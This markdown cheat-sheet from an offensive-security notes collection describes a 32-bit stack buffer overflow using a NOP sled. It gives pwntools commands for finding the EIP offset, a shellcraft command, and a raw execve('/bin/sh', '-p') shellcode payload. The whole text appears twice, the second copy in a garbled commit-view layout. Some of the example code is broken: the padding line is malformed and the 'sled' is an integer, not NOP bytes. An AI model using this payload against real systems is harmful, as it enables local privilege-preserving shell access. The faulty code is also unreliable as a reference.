killchain-compendium/Exploits/Binaries/Cut Stack in Half.md

# Cut Stack in Half + NOPsled

* Stack has to be executable
* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode
* **ASLR has to be off** or `eip` content address pointing into the sled needs to be fuzzed hard

## shellcraft
* for example
```sh
shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s
```

##  Usage
* measure `eip` offset via 
    ```sh
    cyclic <number>
    ```
    * Check eip content via gdb
    ```sh
    cyclic -l <eipContent>
    ```
* Example code
```python
from pwn import *

padding(cyclic(cyclic_find(<eipContent>))
eip = p32(<esp> + some offset into stack)
sled = 90 * 100
shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
payload = padding + eip + sled + shellcode
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# Cut Stack in Half + NOPsled`

			`* Stack has to be executable`
			* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode
			* ASLR has to be off or `eip` content address pointing into the sled needs to be fuzzed hard

			`## shellcraft`
			`* for example`
			```sh
			`shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s`
			```

			`## Usage`
			* measure `eip` offset via
			```sh
			`cyclic <number>`
			```
			`* Check eip content via gdb`
			```sh
			`cyclic -l <eipContent>`
			```
			`* Example code`
			```python
			`from pwn import *`

			`padding(cyclic(cyclic_find(<eipContent>))`
			`eip = p32(<esp> + some offset into stack)`
			`sled = 90 * 100`
			`shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"`
			`payload = padding + eip + sled + shellcode`
			```